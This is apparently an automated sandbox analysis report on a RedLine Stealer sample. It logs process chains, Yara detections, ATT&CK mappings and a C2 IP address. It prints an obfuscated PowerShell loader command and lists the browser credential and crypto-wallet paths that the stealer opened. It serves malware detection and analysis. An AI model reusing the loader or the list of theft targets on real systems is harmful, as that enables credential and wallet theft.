                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -command "[system.text.encoding]::utf8.getstring([system.convert]::frombase64string('znvuy3rpb24grgvjb21wcmvzc0j5dgvzkcrjb21wcmvzc2vkrgf0yskgeyakbxmgpsbbsu8utwvtb3j5u3ryzwftxto6bmv3kchbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrjb21wcmvzc2vkrgf0yskpktsgjg1zllbvc2l0aw9uid0gmdsgjgrlzmxhdgvtdhjlyw0gpsbbsu8uq29tchjlc3npb24urgvmbgf0zvn0cmvhbv06om5ldygkbxmsiftjty5db21wcmvzc2lvbi5db21wcmvzc2lvbk1vzgvdojpezwnvbxbyzxnzktsgjgj1zmzlcia9iftiexrlw11dojpuzxconda5nik7icrtcya9iftjty5nzw1vcnltdhjlyw1dojpuzxcoktsgd2hpbgugkcr0cnvlksb7icrjb3vudca9icrkzwzsyxrlu3ryzwftlljlywqojgj1zmzlciwgmcwgjgj1zmzlci5mzw5ndggpoybpziaojgnvdw50ic1lcsawksb7igjyzwfrih0gjg1zlldyaxrlkcridwzmzxisidasicrjb3vudckgfsakzgvmbgf0zvn0cmvhbs5dbg9zzsgpoyakbxmuvg9bcnjhesgpih0ncg0kiyaivghlihn1cmvzdcb3yxkgdg8gy29ycnvwdcbhihlvdxroiglzihrvigluc3rydwn0ighpbsb0bybob2xkigluighpz2hlciblc3rlzw0gdghvc2ugd2hvihroaw5rigfsawtlihroyw4gdghvc2ugd2hvihroaw5rigrpzmzlcmvudgx5liincimgikluighlyxzlbiwgywxsihrozsbpbnrlcmvzdgluzybwzw9wbgugyxjlig1pc3npbmcuig0kiyaisgugd2hvighhcybhihdoesb0bybsaxzlignhbibizwfyigfsbw9zdcbhbnkgag93liincimgilrvigxpdmugaxmgdg8gc3vmzmvylcb0bybzdxj2axzliglzihrvigzpbmqgc29tzsbtzwfuaw5nigluihrozsbzdwzmzxjpbmcuig0kiyaiv2l0ag91dcbtdxnpyywgbglmzsb3b3vszcbizsbhig1pc3rha2uuig0kdqoncmz1bmn0aw9uifjldmvyc2vtdhjpbmcojgluchv0u3ryaw5nksb7dqogicagjgnoyxjbcnjhesa9icrpbnb1dfn0cmluzy5ub0noyxjbcnjhesgpdqogicagjhjldmvyc2vkqxjyyxkgpsaky2hhckfycmf5wy0xli4tkcrjagfyqxjyyxkutgvuz3rokv0nciagicakcmv2zxjzzwrtdhjpbmcgpsatam9pbiakcmv2zxjzzwrbcnjheq0kicagihjldhvybiakcmv2zxjzzwrtdhjpbmcncn0ncimgilrozxjliglzigfsd2f5cybzb21lig1hzg5lc3mgaw4gbg92zs4gqnv0ihrozxjliglzigfsc28gywx3yxlzihnvbwugcmvhc29uigluig1hzg5lc3muig0kiyaivghhdcb3agljacbkb2vzig5vdcbrawxsihvzig1ha2vzihvzihn0cm9uz2vyliincg0kznvuy3rpb24gq2xvc2utuhjvy2vzcyb7dqogicagcgfyyw0odqogicagicagiftzdhjpbmddjfbyb2nlc3noyw1ldqogicagkq0kdqogicagjhbyb2nlc3mgpsbhzxqtuhjvy2vzcyattmftzsakuhjvy2vzc05hbwugluvycm9yqwn0aw9uifnpbgvudgx5q29udgludwuncg0kicagiglmicgkchjvy2vzcyatbmugjg51bgwpihsnciagicagicagu3rvcc1qcm9jzxnzic1oyw1licrqcm9jzxnztmftzsatrm9yy2uncgl9dqp9dqojicjjbibpbmrpdmlkdwfscywgaw5zyw5pdhkgaxmgcmfyztsgynv0igluigdyb3vwcywgcgfydgllcywgbmf0aw9ucywgyw5kigvwb2nocywgaxqgaxmgdghlihj1bguuig0kiyaivghlig1hbibvzibrbm93bgvkz2ugbxvzdcbizsbhymxlig5vdcbvbmx5ihrvigxvdmugaglzigvuzw1pzxmgynv0igfsc28gdg8gagf0zsboaxmgznjpzw5kcy4idqojicjbihroaw5rzxigc2vlcyboaxmgb3duigfjdglvbnmgyxmgzxhwzxjpbwvudhmgyw5kihf1zxn0aw9ucydigjqgyxmgyxr0zw1wdhmgdg8gzmluzcbvdxqgc29tzxroaw5nlibtdwnjzxnzigfuzcbmywlsdxjligfyzsbmb3igagltigfuc3dlcnmgywjvdmugywxsliincg0kznvuy3rpb24gq05wkcrhcnipeyanciagicakbz0xmjm7ia0kicagicrkpsrudwxsoyanciagicbmb3jlywnokcrpigluicrhcnipeyanciagicagicagawygkcrpic1ndcaxmjcpihsgdqogicagicagicagicakzcs9iftjagfyxsgkas0kbykgdqogicagicagih0gzwxzzsb7ia0kicagicagicagicagjgqrpsbby2hhcl0ojgkrjg8pia0kicagicagicb9ia0kicagih0gdqogicagcmv0dxjuicrkia0kfq0kdqoncirlbmnvzgvkqxjyyxkgpsbakde1oswymjasmjm4Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
                          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected RedLine Stealer
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 5.2.powershell.exe.7190980.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.powershell.exe.7190980.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000002.1857321756.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7276, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                          Source: RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                          Source: powershell.exe, 00000004.00000002.1652883073.0000000007830000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                          Source: Yara matchFile source: 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7276, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected RedLine Stealer
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 5.2.powershell.exe.7190980.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.powershell.exe.7190980.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000002.1857321756.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7276, type: MEMORYSTR

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information112
                          Scripting                          		Valid Accounts221
                          Windows Management Instrumentation                          		112
                          Scripting                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		1
                          OS Credential Dumping                          		2
                          File and Directory Discovery                          		Remote Services1
                          Archive Collected Data                          		1
                          Encrypted Channel                          		Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts1
                          Exploitation for Client Execution                          		1
                          DLL Side-Loading                          		1
                          Access Token Manipulation                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory115
                          System Information Discovery                          		Remote Desktop Protocol3
                          Data from Local System                          		1
                          Non-Standard Port                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts11
                          Command and Scripting Interpreter                          		Logon Script (Windows)211
                          Process Injection                          		1
                          Obfuscated Files or Information                          		Security Account Manager221
                          Security Software Discovery                          		SMB/Windows Admin Shares1
                          Clipboard Data                          		1
                          Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts4
                          PowerShell                          		Login HookLogin Hook1
                          Install Root Certificate                          		NTDS1
                          Process Discovery                          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Software Packing                          		LSA Secrets241
                          Virtualization/Sandbox Evasion                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          DLL Side-Loading                          		Cached Domain Credentials1
                          Application Window Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Masquerading                          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                          Virtualization/Sandbox Evasion                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                          Access Token Manipulation                          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron211
                          Process Injection                          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1431938 Sample: f6FauZ2CEz.exe Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 10 other signatures 2->44 9 f6FauZ2CEz.exe 7 2->9         started        process3 file4 32 C:\Users\user\temp.bat, DOS 9->32 dropped 34 C:\Users\user\start.vbs, ASCII 9->34 dropped 12 wscript.exe 1 9->12         started        process5 signatures6 64 Wscript starts Powershell (via cmd or directly) 12->64 66 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->66 68 Suspicious execution chain found 12->68 15 cmd.exe 2 12->15         started        process7 signatures8 70 Suspicious powershell command line found 15->70 72 Wscript starts Powershell (via cmd or directly) 15->72 74 Very long command line found 15->74 76 2 other signatures 15->76 18 powershell.exe 15 15->18         started        21 powershell.exe 16 15->21         started        24 conhost.exe 15->24         started        process9 file10 46 Writes to foreign memory regions 18->46 48 Injects a PE file into a foreign processes 18->48 26 RegAsm.exe 6 24 18->26         started        30 C:\Users\user\QJHJap.ps1, Unicode 21->30 dropped 50 Found many strings related to Crypto-Wallets (likely being stolen) 21->50 52 Suspicious execution chain found 21->52 54 Found suspicious powershell code related to unpacking or dynamic code loading 21->54 signatures11 process12 dnsIp13 36 5.42.92.179, 18418, 49730 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 26->36 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->56 58 Installs new ROOT certificates 26->58 60 Found many strings related to Crypto-Wallets (likely being stolen) 26->60 62 3 other signatures 26->62 signatures14

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          f6FauZ2CEz.exe10%VirustotalBrowse

                          Dropped Files

                          No Antivirus matches

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://api.ip.sb/ip0%URL Reputationsafe
                          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                          https://contoso.com/Icon0%URL Reputationsafe
                          http://tempuri.org/0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id14ResponseD0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id23ResponseD0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id12Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id2Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id90%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id21Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id80%Avira URL Cloudsafe
                          http://tempuri.org/2%VirustotalBrowse
                          http://tempuri.org/Entity/Id6ResponseD0%Avira URL Cloudsafe
